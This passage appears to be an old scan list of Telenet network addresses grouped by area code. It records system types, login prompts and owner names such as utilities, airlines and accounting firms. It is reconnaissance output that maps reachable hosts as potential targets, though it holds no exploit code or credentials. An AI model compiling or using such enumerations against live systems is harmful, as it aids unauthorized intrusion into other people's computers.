872 PRIME MD.PIT
|
|||
|
873 PRIME ACMC01
|
|||
|
874 PRIME PITTCS
|
|||
|
875 PRIME MD.CLE
|
|||
|
902 PRIME MD.HOU
|
|||
|
905 PRIME OASG
|
|||
|
908 PRIME WMCS
|
|||
|
910 PRIME CSWDC
|
|||
|
911 PRIME VIENNA
|
|||
|
912 PRIME BALT
|
|||
|
928 PRIME CS.HOU
|
|||
|
930 PRIME MD.AUS
|
|||
|
931 PRIME CS.SCR
|
|||
|
937 PRIME TRNED
|
|||
|
957 PRIME ZULE
|
|||
|
958 PRIME EDOC1
|
|||
|
959 PRIME FUZZY
|
|||
|
962 PRIME PBN49
|
|||
|
* 971
|
|||
|
* 972
|
|||
|
* 973
|
|||
|
* 974
|
|||
|
980 PRIME WUFPAK
|
|||
|
981 PRIME WMMKT
|
|||
|
986
|
|||
|
993 CU-Manchester-
|
|||
|
995 PRIME ATC55
|
|||
|
996 PRIME PBN65
|
|||
|
998 PRIME TRNGB
|
|||
|
3088 VAX DELPHI
|
|||
|
|
|||
|
619--CALIFORNIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 31 Environment Ctrl Monitor
|
|||
|
41 VM/370
|
|||
|
* 51
|
|||
|
56
|
|||
|
57
|
|||
|
$ 62 AOS
|
|||
|
$ 63 AOS
|
|||
|
|
|||
|
|
|||
|
626--UNKNOWN--ADDRESSES SCANNED: VARIOUS
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 1000 PRIME
|
|||
|
$ 1002 VAX Pacific Gas & Electric
|
|||
|
|
|||
|
|
|||
|
703--VIRGINIA--ADDRESSES SCANNED: 0-1300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 32
|
|||
|
$ 33 AOS
|
|||
|
40 VAX
|
|||
|
41 VAX
|
|||
|
$ 42 ENTER USERID:
|
|||
|
44 AOS Project HOPE
|
|||
|
$ 53 HP-3000
|
|||
|
55 ENTER SWITCH CHARS
|
|||
|
141 enter /login
|
|||
|
142 "
|
|||
|
160 VAX
|
|||
|
163a
|
|||
|
$ 168
|
|||
|
* 176
|
|||
|
$ 177 AOS
|
|||
|
* 206
|
|||
|
* 207
|
|||
|
$ 253 AOS
|
|||
|
$ 254 AOS
|
|||
|
$ 255 AOS
|
|||
|
$ 256 AOS
|
|||
|
$ 257 AOS
|
|||
|
$ 262 AOS
|
|||
|
* 340
|
|||
|
* 341
|
|||
|
* 342
|
|||
|
$ 344 ** NETWORK SIGN-ON FAILED:
|
|||
|
* 346
|
|||
|
367 P.R.C.
|
|||
|
371 P.R.C.
|
|||
|
* 377
|
|||
|
431 TACL 1>
|
|||
|
* 460
|
|||
|
* 461
|
|||
|
$ 463 DEC-20
|
|||
|
* 464
|
|||
|
$ 466 DEC-20
|
|||
|
* 467
|
|||
|
$ 468
|
|||
|
$ 469 Decserver
|
|||
|
* 470
|
|||
|
511 bcs network
|
|||
|
512 bcs network
|
|||
|
530 bcs network
|
|||
|
$ 1000 FCC FIRSTRA'
|
|||
|
$ 1001 FCC FIRSTRA'
|
|||
|
|
|||
|
|
|||
|
704--NORTH CAROLINA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 31 AOS
|
|||
|
$ 32 AOS
|
|||
|
* 60
|
|||
|
* 61
|
|||
|
* 62
|
|||
|
$ 63 AOS
|
|||
|
* 64
|
|||
|
* 168
|
|||
|
170
|
|||
|
171
|
|||
|
173
|
|||
|
|
|||
|
|
|||
|
707--CALIFORNIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 48 AOS
|
|||
|
$ 49 AOS
|
|||
|
$ 50 AOS
|
|||
|
$ 51 AOS
|
|||
|
$ 52 AOS
|
|||
|
|
|||
|
|
|||
|
711--UNKNOWN--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
15 PRIME
|
|||
|
|
|||
|
|
|||
|
713--TEXAS--ADDRESSES SCANNED: 0-500
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 24 PC Pursuit Dialer (2400)
|
|||
|
* 42
|
|||
|
$ 43 ID
|
|||
|
$ 44 ID
|
|||
|
* 58
|
|||
|
73 PRIME TXNODE
|
|||
|
76 %u@IUeASID@cAbR@CUDEz
|
|||
|
77 "
|
|||
|
79 "
|
|||
|
80 "
|
|||
|
81 "
|
|||
|
$ 113 PC Pursuit Dialer (300)
|
|||
|
$ 114 PC Pursuit Dialer (1200)
|
|||
|
146 %u@IUeASID@cAbR@CUDEz
|
|||
|
* 167
|
|||
|
* 224
|
|||
|
* 227
|
|||
|
* 228
|
|||
|
* 232
|
|||
|
* 234
|
|||
|
$ 238 HP-3000
|
|||
|
239 Compaq
|
|||
|
255 PRIME SYS1
|
|||
|
$ 260 PRIME HOUSTN
|
|||
|
276
|
|||
|
* 335
|
|||
|
336 PRIME GANODE
|
|||
|
340a
|
|||
|
345 COMM520
|
|||
|
346a Telenet Async to 3270
|
|||
|
$ 364 VAX
|
|||
|
366 PRIME CANODE
|
|||
|
368 PRIME MANODE
|
|||
|
$ 371 Coca-Cola Foods
|
|||
|
431
|
|||
|
|
|||
|
|
|||
|
714--CALIFORNIA--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 4 PC Pursuit Dialer (2400)
|
|||
|
$ 23 PC Pursuit Dialer (300)
|
|||
|
$ 24 PC Pursuit Dialer (1200)
|
|||
|
$ 33 911 Monitor ECM
|
|||
|
$ 41 AGS
|
|||
|
48 PRIME TWCALF
|
|||
|
49 SERVICE ID=
|
|||
|
$ 55 HP-3000
|
|||
|
$ 62 AOS
|
|||
|
$ 63 AOS
|
|||
|
$ 64 AOS
|
|||
|
$ 65 AOS
|
|||
|
$ 66 AOS
|
|||
|
$ 67 AOS
|
|||
|
$ 68 AOS
|
|||
|
72 PRIME FSCOPE
|
|||
|
$ 102 PC Pursuit Dialer (2400)
|
|||
|
$ 119 PC Pursuit Dialer (300)
|
|||
|
$ 121 PC Pursuit Dialer (1200)
|
|||
|
$ 130 MMSA
|
|||
|
131 PRIME CAJH
|
|||
|
* 133
|
|||
|
* 145
|
|||
|
$ 160 HP-3000
|
|||
|
* 164
|
|||
|
166 HP-3000
|
|||
|
* 167
|
|||
|
* 168
|
|||
|
* 169
|
|||
|
171 COMMAND UNRECOGNIZED
|
|||
|
172 "
|
|||
|
* 178
|
|||
|
$ 210 PC Pursuit Dialer (300)
|
|||
|
$ 213 PC Pursuit Dialer (1200)
|
|||
|
$ 240 AOS
|
|||
|
246 COMMAND UNRECOGNIZED
|
|||
|
$ 272 AOS
|
|||
|
* 273
|
|||
|
$ 274 AOS
|
|||
|
$ 275 AOS
|
|||
|
$ 276 AOS
|
|||
|
|
|||
|
|
|||
|
716--NEW YORK--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
23 enter user code please
|
|||
|
25 "
|
|||
|
31 HP-3000
|
|||
|
50
|
|||
|
130 enter logon request-
|
|||
|
131 "
|
|||
|
133 "
|
|||
|
$ 135 VAX
|
|||
|
|
|||
|
|
|||
|
717--PENNSYLVANIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
8 VM/370
|
|||
|
* 24
|
|||
|
* 31
|
|||
|
* 32
|
|||
|
* 33
|
|||
|
* 34
|
|||
|
40 PRIME IREX
|
|||
|
42 PRIME IREX
|
|||
|
45 VOS
|
|||
|
46 VOS
|
|||
|
47 Camp Hill Mgt. Info Center
|
|||
|
48 "
|
|||
|
50
|
|||
|
51 Telenet Async to 3270
|
|||
|
52a Telenet Async to 3270
|
|||
|
53
|
|||
|
* 150
|
|||
|
* 153
|
|||
|
* 154
|
|||
|
* 160
|
|||
|
* 161
|
|||
|
* 162
|
|||
|
* 163
|
|||
|
|
|||
|
|
|||
|
801--UTAH--ADDRESSES SCANNED: 0-500
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 12 PC Pursuit Dialer (2400)
|
|||
|
$ 20 PC Pursuit Dialer (300)
|
|||
|
$ 21 PC Pursuit Dialer (1200)
|
|||
|
24 Wasatch System
|
|||
|
25 "
|
|||
|
26 "
|
|||
|
27 "
|
|||
|
$ 35 ID
|
|||
|
* 37
|
|||
|
$ 39 AOS
|
|||
|
$ 44 AOS
|
|||
|
$ 49 AOS
|
|||
|
$ 52 AOS
|
|||
|
$ 54 VAX
|
|||
|
$ 57 AOS
|
|||
|
$ 60 AOS
|
|||
|
$ 62 AOS
|
|||
|
$ 65 AOS
|
|||
|
$ 130 AOS
|
|||
|
144
|
|||
|
* 150
|
|||
|
$ 151 AOS
|
|||
|
* 152
|
|||
|
$ 153 AOS
|
|||
|
176
|
|||
|
$ 231 AOS
|
|||
|
$ 232 AOS
|
|||
|
$ 239 AOS
|
|||
|
250 ID?>
|
|||
|
257
|
|||
|
258
|
|||
|
|
|||
|
|
|||
|
802--VERMONT--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 31 AOS
|
|||
|
$ 32 AOS
|
|||
|
$ 33 ID
|
|||
|
* 35
|
|||
|
* 36
|
|||
|
$ 37 AOS
|
|||
|
$ 38 AOS
|
|||
|
|
|||
|
|
|||
|
803--SOUTH CAROLINA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 30
|
|||
|
* 32
|
|||
|
$ 50
|
|||
|
$ 51 KEMET ELECTRONICS
|
|||
|
* 55
|
|||
|
60 Telenet Async to 3270
|
|||
|
61a Telenet Async to 3270
|
|||
|
$ 70 AOS
|
|||
|
* 71
|
|||
|
* 74
|
|||
|
$ 77 AOS
|
|||
|
131 Kemet
|
|||
|
132a Telenet Async to 3270
|
|||
|
* 133
|
|||
|
$ 135 PRIME PRISM
|
|||
|
|
|||
|
|
|||
|
804--VIRGINIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
35 VAX
|
|||
|
* 43
|
|||
|
* 45
|
|||
|
$ 60 ID
|
|||
|
* 61
|
|||
|
* 62
|
|||
|
* 155
|
|||
|
$ 160 AOS
|
|||
|
|
|||
|
|
|||
|
805--CALIFORNIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
50 VAX
|
|||
|
51 VAX
|
|||
|
* 58
|
|||
|
* 59
|
|||
|
* 60
|
|||
|
* 61
|
|||
|
* 62
|
|||
|
* 63
|
|||
|
* 64
|
|||
|
* 65
|
|||
|
* 74
|
|||
|
90
|
|||
|
100
|
|||
|
101 UNIX salt.acc.com
|
|||
|
130
|
|||
|
150 PRIME MBM
|
|||
|
|
|||
|
|
|||
|
808--HAWAII--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 40 VAX
|
|||
|
100 PRIME
|
|||
|
|
|||
|
|
|||
|
811--GTE--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 15
|
|||
|
17 HP-3000
|
|||
|
21 UNIX GTE RPU2
|
|||
|
22 UNIX GTE IPU
|
|||
|
24 UNIX GTE RPU1
|
|||
|
25 TACL 1>
|
|||
|
28 TACL 1>
|
|||
|
118 CANNOT EXEC!
|
|||
|
123 HP-3000
|
|||
|
* 129
|
|||
|
* 143
|
|||
|
* 217
|
|||
|
* 219
|
|||
|
|
|||
|
|
|||
|
812--INDIANA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
|
|||
|
|
|||
|
813--FLORIDA--ADDRESSES SCANNED: 0-700
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 20 PC Pursuit Dialer (300)
|
|||
|
$ 21 PC Pursuit Dialer (1200)
|
|||
|
* 33
|
|||
|
35 PRIME S9750
|
|||
|
43 ** 4200 TERMINAL TYPE:
|
|||
|
$ 52 DEC-20 Price Waterhouse
|
|||
|
$ 53 VAX
|
|||
|
$ 55 PRICE WATERHOUSE
|
|||
|
$ 59 Telenet Async to 3270
|
|||
|
73 VM/370
|
|||
|
74 ** 4200 TERMINAL TYPE:
|
|||
|
* 76
|
|||
|
$ 124 PC Pursuit Dialer (2400)
|
|||
|
131 IBM INFORMATION SERVICES
|
|||
|
143 "
|
|||
|
147 "
|
|||
|
* 148
|
|||
|
* 151
|
|||
|
* 153
|
|||
|
* 154
|
|||
|
160 VAX
|
|||
|
161 VAX
|
|||
|
164 VAX
|
|||
|
* 165
|
|||
|
166a Telenet Async to 3270
|
|||
|
* 167
|
|||
|
$ 169 GS/1
|
|||
|
172 IBM INFORMATION SERVICES
|
|||
|
174 "
|
|||
|
210
|
|||
|
214
|
|||
|
215
|
|||
|
218
|
|||
|
* 222
|
|||
|
$ 225 ----SECURITY SUBSYSTEM----
|
|||
|
$ 226 "
|
|||
|
* 265
|
|||
|
267 IBM INFORMATION SERVICES
|
|||
|
$ 268 U#=
|
|||
|
269a VAX Addidas
|
|||
|
271 Access Code:
|
|||
|
272 PRIME
|
|||
|
275 Access Code:
|
|||
|
277 U#=
|
|||
|
* 330
|
|||
|
344 TACL 1>
|
|||
|
346 "
|
|||
|
350 VAX
|
|||
|
* 351
|
|||
|
355
|
|||
|
* 360
|
|||
|
* 361
|
|||
|
430 Telenet Async to 3270
|
|||
|
431a Telenet Async to 3270
|
|||
|
436 U#=
|
|||
|
438 VAX DEC/ETONIC
|
|||
|
* 460
|
|||
|
465 Martin Marietta
|
|||
|
466 Martin Marietta
|
|||
|
467 Enter Switch Characters
|
|||
|
468 "
|
|||
|
660
|
|||
|
|
|||
|
|
|||
|
814--PENNSYLVANIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
50 PRIME SYSA
|
|||
|
* 53
|
|||
|
$ 130 VAX
|
|||
|
$ 137 AOS
|
|||
|
|
|||
|
|
|||
|
816--MISSOURI--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
36
|
|||
|
* 38
|
|||
|
* 43
|
|||
|
$ 44 AOS
|
|||
|
* 45
|
|||
|
$ 57 AOS
|
|||
|
$ 58 AOS
|
|||
|
* 59
|
|||
|
$ 62
|
|||
|
77
|
|||
|
$ 104 PC Pursuit Dialer (300)
|
|||
|
$ 113 PC Pursuit Dialer (1200)
|
|||
|
$ 150
|
|||
|
* 157
|
|||
|
* 161
|
|||
|
189 CDCNET
|
|||
|
|
|||
|
|
|||
|
817--TEXAS--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 33
|
|||
|
$ 35 PRIME FWRTH
|
|||
|
* 36
|
|||
|
* 37
|
|||
|
141 VAX Tandy Information Service
|
|||
|
* 160
|
|||
|
* 161
|
|||
|
* 162
|
|||
|
|
|||
|
|
|||
|
818--CALIFORNIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 20
|
|||
|
$ 21 PC Pursuit Dialer (1200)
|
|||
|
* 29
|
|||
|
* 50
|
|||
|
$ 130
|
|||
|
* 139
|
|||
|
|
|||
|
|
|||
|
888--GTE HAWAIIAN TELEPHONE--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 25
|
|||
|
$ 51
|
|||
|
* 52
|
|||
|
$ 53 PRIME HAWAII
|
|||
|
* 30
|
|||
|
* 45
|
|||
|
* 50
|
|||
|
|
|||
|
|
|||
|
890--UNKNOWN--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 100 ADTN USER ID
|
|||
|
$ 102 "
|
|||
|
$ 103 "
|
|||
|
$ 109 GS/1
|
|||
|
$ 110 ADTN USER ID
|
|||
|
$ 125 "
|
|||
|
$ 126 "
|
|||
|
$ 129 "
|
|||
|
|
|||
|
|
|||
|
901--TENNESSEE--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 30
|
|||
|
* 134
|
|||
|
|
|||
|
|
|||
|
904--FLORIDA--ADDRESSES SCANNED: 0-400
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 34 AOS
|
|||
|
$ 41 AOS
|
|||
|
$ 45 AOS
|
|||
|
$ 50 AOS
|
|||
|
51 COMMAND UNRECOGNIZED
|
|||
|
52 COMMAND UNRECOGNIZED
|
|||
|
53 COMMAND UNRECOGNIZED
|
|||
|
$ 55 AOS
|
|||
|
$ 56 AOS
|
|||
|
$ 58 ID
|
|||
|
* 60
|
|||
|
141
|
|||
|
* 160
|
|||
|
* 161
|
|||
|
232
|
|||
|
* 235
|
|||
|
|
|||
|
|
|||
|
907--ALASKA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 31 ID
|
|||
|
* 32
|
|||
|
$ 33 AOS
|
|||
|
* 34
|
|||
|
$ 35 AOS
|
|||
|
$ 44
|
|||
|
$ 45 AOS
|
|||
|
* 46
|
|||
|
$ 47 AOS
|
|||
|
$ 48 AOS
|
|||
|
* 50
|
|||
|
* 51
|
|||
|
$ 130 AOS
|
|||
|
138
|
|||
|
|
|||
|
|
|||
|
909--TELENET--ADDRESSES SCANNED: 0-1000
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 3 Telenet Port
|
|||
|
8 PRIME
|
|||
|
9 PRIME
|
|||
|
10 PRIME
|
|||
|
12 PRIME
|
|||
|
13
|
|||
|
14 Telenet Port
|
|||
|
23 PRIME
|
|||
|
26 PRIME
|
|||
|
27 PRIME
|
|||
|
38 PRIME
|
|||
|
39 USER ID
|
|||
|
44 PRIME
|
|||
|
52
|
|||
|
53 PRIME
|
|||
|
54
|
|||
|
56 PRIME
|
|||
|
60 PRIME
|
|||
|
61 PRIME
|
|||
|
62 PRIME
|
|||
|
63 PRIME
|
|||
|
65 PRIME
|
|||
|
73 PRIME
|
|||
|
77 PRIME
|
|||
|
78 PRIME
|
|||
|
79 MHP201A
|
|||
|
90 PRIME
|
|||
|
92 PRIME
|
|||
|
94 PRIME
|
|||
|
95 PRIME
|
|||
|
97 PRIME
|
|||
|
98 PRIME
|
|||
|
100 PRIME
|
|||
|
101 USER ID
|
|||
|
102 USER ID
|
|||
|
104
|
|||
|
117 PRIME
|
|||
|
123 PRIME
|
|||
|
130 PRIME
|
|||
|
131 PRIME
|
|||
|
136 PRIME
|
|||
|
137 PRIME
|
|||
|
139 PRIME
|
|||
|
141 PRIME
|
|||
|
143 PRIME
|
|||
|
144 PRIME
|
|||
|
146 PRIME Telemail
|
|||
|
147 PRIME "
|
|||
|
148 PRIME "
|
|||
|
149 PRIME "
|
|||
|
151
|
|||
|
153 TACL 1>
|
|||
|
154 "
|
|||
|
155 PRIME Telemail
|
|||
|
158 PRIME "
|
|||
|
159 PRIME "
|
|||
|
160 PRIME "
|
|||
|
161 PRIME "
|
|||
|
162 PRIME
|
|||
|
165 PRIME Telemail
|
|||
|
168 PRIME "
|
|||
|
* 170
|
|||
|
171
|
|||
|
172
|
|||
|
173 PRIME
|
|||
|
176 PRIME
|
|||
|
178 USER ID
|
|||
|
179 "
|
|||
|
184 "
|
|||
|
187
|
|||
|
197
|
|||
|
198
|
|||
|
205 PRIME
|
|||
|
206 PRIME
|
|||
|
235 PRIME
|
|||
|
236 PRIME
|
|||
|
239 PRIME
|
|||
|
$ 312 !Load and Function Tester
|
|||
|
$ 314 "
|
|||
|
316 "
|
|||
|
$ 317 "
|
|||
|
318 "
|
|||
|
319 "
|
|||
|
325
|
|||
|
328 !Load and Function Tester
|
|||
|
330 FRAME TESTER?
|
|||
|
338 !Load and Function Tester
|
|||
|
400 PRIME Telemail
|
|||
|
401 PRIME "
|
|||
|
403 PRIME "
|
|||
|
404 PRIME "
|
|||
|
406 PRIME "
|
|||
|
407 PRIME
|
|||
|
408 PRIME
|
|||
|
409 PRIME
|
|||
|
508 PRIME
|
|||
|
600 VAX
|
|||
|
615 PRIME
|
|||
|
622 PRIME
|
|||
|
623 PRIME
|
|||
|
624 PRIME
|
|||
|
626 PRIME
|
|||
|
627 PRIME
|
|||
|
628 PRIME
|
|||
|
629 PRIME
|
|||
|
630 PRIME
|
|||
|
631 PC Pursuit BBS
|
|||
|
632
|
|||
|
633
|
|||
|
634
|
|||
|
635
|
|||
|
643 PRIME
|
|||
|
646
|
|||
|
650 PRIME
|
|||
|
651 PRIME
|
|||
|
656
|
|||
|
657
|
|||
|
658
|
|||
|
659
|
|||
|
660
|
|||
|
661
|
|||
|
663
|
|||
|
664
|
|||
|
675 PRIME
|
|||
|
676 PRIME
|
|||
|
677 PRIME
|
|||
|
678 PRIME
|
|||
|
679 PRIME
|
|||
|
680 PRIME
|
|||
|
686 Telenet FE BBS1
|
|||
|
747
|
|||
|
751 TELENET MUS/XA NETWORK
|
|||
|
761 PRIME Telemail
|
|||
|
762 PRIME
|
|||
|
763 PRIME
|
|||
|
764 Telenet Async to 3270
|
|||
|
767 TELENET NUS/XA NETWORK
|
|||
|
770 PRIME
|
|||
|
772 PRIME
|
|||
|
773 PRIME
|
|||
|
777 Telenet Async to 3270
|
|||
|
779 "
|
|||
|
781 "
|
|||
|
782 "
|
|||
|
784 "
|
|||
|
798 PRIME
|
|||
|
799 PRIME
|
|||
|
800 PRIME
|
|||
|
801 PRIME
|
|||
|
805 PRIME
|
|||
|
810 PRIME
|
|||
|
811 PRIME
|
|||
|
815 PRIME
|
|||
|
816 PRIME
|
|||
|
817 PRIME
|
|||
|
818 PRIME
|
|||
|
819 PRIME
|
|||
|
822 PRIME
|
|||
|
823 PRIME
|
|||
|
824 PRIME
|
|||
|
825 PRIME
|
|||
|
826 PRIME
|
|||
|
827 PRIME
|
|||
|
828 PRIME
|
|||
|
830 PRIME
|
|||
|
831 PRIME
|
|||
|
832 PRIME
|
|||
|
833 PRIME
|
|||
|
834 PRIME
|
|||
|
840 PRIME Telemail
|
|||
|
841 PRIME "
|
|||
|
842 PRIME "
|
|||
|
843 PRIME "
|
|||
|
844 PRIME "
|
|||
|
845 PRIME "
|
|||
|
846
|
|||
|
847
|
|||
|
848 PRIME Telemail
|
|||
|
893 PRIME
|
|||
|
894 PRIME
|
|||
|
900 PRIME
|
|||
|
901 PRIME
|
|||
|
902 PRIME
|
|||
|
911 PRIME
|
|||
|
912 PRIME
|
|||
|
|
|||
|
|
|||
|
910--TELENET--ADDRESSES SCANNED: VARIOUS
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
100 PRIME
|
|||
|
200 PRIME
|
|||
|
300 PRIME
|
|||
|
400 PRIME
|
|||
|
500 PRIME
|
|||
|
|
|||
|
|
|||
|
912--GEORGIA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
30
|
|||
|
* 31
|
|||
|
|
|||
|
|
|||
|
913--KANSAS--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 32 ID
|
|||
|
* 34
|
|||
|
$ 150 PRIME TOPEKA
|
|||
|
|
|||
|
|
|||
|
914--NEW YORK--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 32 VM/370
|
|||
|
33 VM/370
|
|||
|
34 >>
|
|||
|
35 >>
|
|||
|
* 38
|
|||
|
$ 41 VM/370 Pepsi
|
|||
|
* 42
|
|||
|
50 Mnematics
|
|||
|
133
|
|||
|
* 160
|
|||
|
|
|||
|
|
|||
|
916--CALIFORNIA--ADDRESSES SCANNED: 0-700
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 7 PC Pursuit Dialer (2400)
|
|||
|
$ 11 PC Pursuit Dialer (300)
|
|||
|
$ 12 PC Pursuit Dialer (1200)
|
|||
|
$ 30 AOS
|
|||
|
$ 33 AOS
|
|||
|
$ 34 PRIME SACRA
|
|||
|
$ 36 ID
|
|||
|
$ 39 AOS
|
|||
|
$ 40 AOS
|
|||
|
$ 41 ID
|
|||
|
55 PRIME FIMSAC
|
|||
|
$ 56 AOS
|
|||
|
$ 57 AOS
|
|||
|
$ 58 AOS
|
|||
|
$ 59 AOS
|
|||
|
$ 63 AOS
|
|||
|
$ 64 AOS
|
|||
|
$ 130 AOS
|
|||
|
$ 131 AOS
|
|||
|
$ 132 AOS
|
|||
|
$ 133 AOS
|
|||
|
$ 134 AOS
|
|||
|
$ 141 AOS
|
|||
|
$ 168 AOS
|
|||
|
* 169
|
|||
|
* 171
|
|||
|
$ 232 AOS
|
|||
|
$ 233 AOS
|
|||
|
* 234
|
|||
|
$ 235 AOS
|
|||
|
$ 236 AOS
|
|||
|
240
|
|||
|
268 Telenet Async to 3270
|
|||
|
* 330
|
|||
|
* 331
|
|||
|
* 332
|
|||
|
* 333
|
|||
|
* 334
|
|||
|
* 335
|
|||
|
* 336
|
|||
|
* 337
|
|||
|
* 338
|
|||
|
* 339
|
|||
|
350
|
|||
|
* 360
|
|||
|
* 361
|
|||
|
* 362
|
|||
|
* 363
|
|||
|
* 364
|
|||
|
* 365
|
|||
|
* 366
|
|||
|
* 367
|
|||
|
* 368
|
|||
|
* 369
|
|||
|
$ 530
|
|||
|
* 531
|
|||
|
607 UNIX IPA State Net
|
|||
|
608 UNIX IPA State Net
|
|||
|
|
|||
|
|
|||
|
918--OKLAHOMA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 ID
|
|||
|
40 CUSTOMER ID:
|
|||
|
105 American Airlines
|
|||
|
130 American Airlines
|
|||
|
|
|||
|
|
|||
|
919--NORTH CAROLINA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 20 PC Pursuit Dialer (300)
|
|||
|
$ 21 PC Pursuit Dialer (1200)
|
|||
|
$ 33 ID
|
|||
|
$ 34 AOS
|
|||
|
* 36
|
|||
|
* 38
|
|||
|
43 enter system id
|
|||
|
44 "
|
|||
|
46 "
|
|||
|
47 VM/370 Northern Telcom
|
|||
|
* 58
|
|||
|
$ 59 AOS
|
|||
|
* 60
|
|||
|
$ 70 HP-3000
|
|||
|
